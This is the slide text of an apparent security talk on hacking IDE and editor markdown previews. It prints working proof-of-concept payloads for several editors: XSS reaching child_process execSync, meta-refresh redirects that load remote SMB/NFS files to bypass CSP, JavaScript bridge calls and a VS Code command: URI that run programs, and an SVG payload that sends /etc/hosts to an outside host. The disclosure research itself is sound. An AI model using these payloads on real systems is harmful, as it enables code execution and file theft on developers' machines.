Hacking Every* Major IDE in 2 Weeks

By Matt Austin �@mattaustin�http://m-austin.com

## Who is Matt Austin?

• Director of Security Research @ Contrast Security Developing IAST / RASP tools.
• Application Security for 8 years with experience in code review, architecture review, penetration testing, and security research.
• Bounty Stuff? Hall of fame on Facebook 3x (plus pre bounty), Google (2 CVE's in Chrome) , Atlassian (2x), Spotify, Github, and more...

​

​

## What is the “Desktop Web”?

• Just a browser built into a desktop app.. (Slack, HipChat, VSCode)
• Frameworks: Electron (atom shell), NWjs, MacGap
• Mobile “web native”: Cordova PhoneGap, ionic
• Native app with embedded

​

​

## Exploiting the “Desktop Web”

• All the same “web techniques” can now be used to attack desktop apps
• Same origin policy of the desktop is.. ?
• XSS can result in remote code execution.

## What is markdown? ![]()

“Markdown is a lightweight markup language with plain text formatting syntax.”

• Bugcrowd, Github, bitbucket comments PR’s ..
• Documentation readme.md (project details)
• Full Blog platforms (Ghost, Jekyll, Hugo…)

# H1

## H2

*italics* or _italics_.

**bold** or __b__.

H1

H2

*italics*

bold

<h1>H1</h1>�<H2>H2</h2>�<i>italics</i>�<b>b</b>

​

## Why so hackable?

“For any markup that is not covered by Markdown’s syntax, you simply use HTML itself. There’s no need to preface it or delimit it to indicate that you’re switching from Markdown to HTML; you just use the tags.”

# H1

## H2

*italics* or _italics_.

**bold** or __b__.

H1

H2

*italics*

bold

<h1>H1</h1>�<H2>H2</h2>�<i>italics</i>�<b>b</b>

<iframe src="http://example.com"></iframe>

​

## Who did it wrong?

# Abusing Electron

## Abusing Electron

“Build cross platform desktop apps with JavaScript, HTML, and CSS”

node.js

chromium

+

## Abusing Electron

Who uses it:

Visual Studio Code

Github Atom

Adobe Brackets *

Markly

...

## Abusing Electron: Visual Studio Code

<script>

top.require('child_process').execSync('open -a Calculator')�</script>

## Abusing Electron: Visual Studio Code

The Fix: Add CSP

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src 'self' http: https: data:; media-src 'self' http: https: data:; child-src 'none'; script-src 'nonce-${nonce}'; style-src 'nonce-${nonce}' 'self' 'unsafe-inline' http: https: data:;">

​

1. https://github.com/Microsoft/vscode/commit/4ebfc2fc18ad1ca65b44f5c1c7c95ad347367beb
2. https://github.com/Microsoft/vscode/issues/22268

## Abusing Electron: Visual Studio Code

Important things to know:

1. CSP does not prevent meta redirects. (<meta http-equiv="refresh" content="1; url=...) �https://github.com/w3c/webappsec-csp/issues/112�
2. When accessing remote “Network” resources (SMB on windows and NFS on OSX) these auto-mount to known locations. This allows us to have a remotely controlled “local” file.

​

CSP Bypass!

## Abusing Electron: Visual Studio Code

Windows (SMB url):

<meta http-equiv="refresh" content="1; url=file://\\192.241.239.91\Share\rce_win.html">

�macOS:

<meta http-equiv="refresh" content="1; url=file:////net/192.241.239.91/var/nfs/general/rce.html">

​

​

rce.html:

<script>�document.write(top.require('child_process').execSync('ls; open -a Calculator'))�</script>

​

​

CSP Bypass!

## Abusing Electron: Visual Studio Code

Fix #2:

• Block any navigation on the preview frame. �
• Disable “nodeintegration” in webview component in Electron.

​

​

​

​

​

​

CSP Bypass

newFrame.contentWindow.onbeforeunload = function (e) {� console.log('prevented webview navigation');� return false;�};newFrame.contentWindow.onbeforeunload = function (e) {� console.log('prevented webview navigation');� return false;�};

## Abusing Electron: Github Atom Editor

## Abusing (not) Electron: Adobe Brackets

## Abusing (not) Electron: Adobe Brackets

RCE.html�----------------------------------�<script>� src = location.href.replace('file://', '').replace(/html$/, 'js');� var brackets = top.brackets;� var NodeConnection = brackets.getModule('utils/NodeConnection');� var nodeConnection = new NodeConnection();� nodeConnection.connect(true).done(function () {� nodeConnection.loadDomains([src], true).done(function () {});� });�</script>�----------------------------------�RCE.js�----------------------------------�return require('child_process').execSync('say hi && open file:///Applications/Calculator.app');�----------------------------------

​

# Abusing “open in browser”

## Abusing “open in browser” MacDown 0.6.4

## Abusing “open in browser”

But…

• We can only call local files*.
• The file must be +x ... or the default action for a file type must execute it.

## Abusing “open in browser” MacDown 0.6.4

## .terminal files on OSX

# Abusing Javascript Bridge

## Abusing Javascript Bridge: JetBrains

<script>� setTimeout(function(){� if(window.navigator.platform === 'Win32'){� // Windows� JavaPanelBridge.openInExternalBrowser('file:///C:/Windows/System32/calc.exe')� }else{� //macOS� JavaPanelBridge.openInExternalBrowser('file:///Applications/Calculator.app');� }� }, 100)�</script>

## Abusing Javascript Bridge: JetBrains

Abusing The Javascript Bridge: TextMate

<script>� TextMate.system('open -a Calculator', function(data){�� });�</script>

​

Note: this also works with the HTML preview.

Abusing The Javascript Bridge: TextMate

# Abusing URL Schemes

## Abusing URL Schemes: VSCode

<a href="command:vscode.startDebug?{"type":"node","request":"launch","args":["-e","process.exit(require('child_process').execSync('open -a Calculator'))"]}">Debugger Test...</a>.

SOP / File Exfiltration

SOP / File Exfiltration: Eclipse

<svg onload="� r=new XMLHttpRequest();� r.open('GET','file:///etc/hosts',false);� r.send(null);

data=r.responseText;� r.open('POST','https://s41wuornbvk7.runscope.net',false);� r.send(data);�">

SOP / File Exfiltration: Eclipse

## Other Notes

1. Check for open Ports / APIs. (Jetbrains had another bypass in a built in API)
2. Look at rendered code. Test with <XMP> tag.
3. MD to relative files will sometimes resolve to full path. (this can be helpful)
4. Target tools that can’t be OS sandboxed.

## Exploit Techniques

• Abusing Electron
• Abusing Same Origin Policy
• Abusing “open in default browser” behavior
• Abusing Custom URL Schemes / Protocol Handling
• Abuse the API / JavascriptBridge (other ways to attack non electron apps Eclipse, IntelliJ, RubyMine)

Questions?�(@mattaustin)

The end <3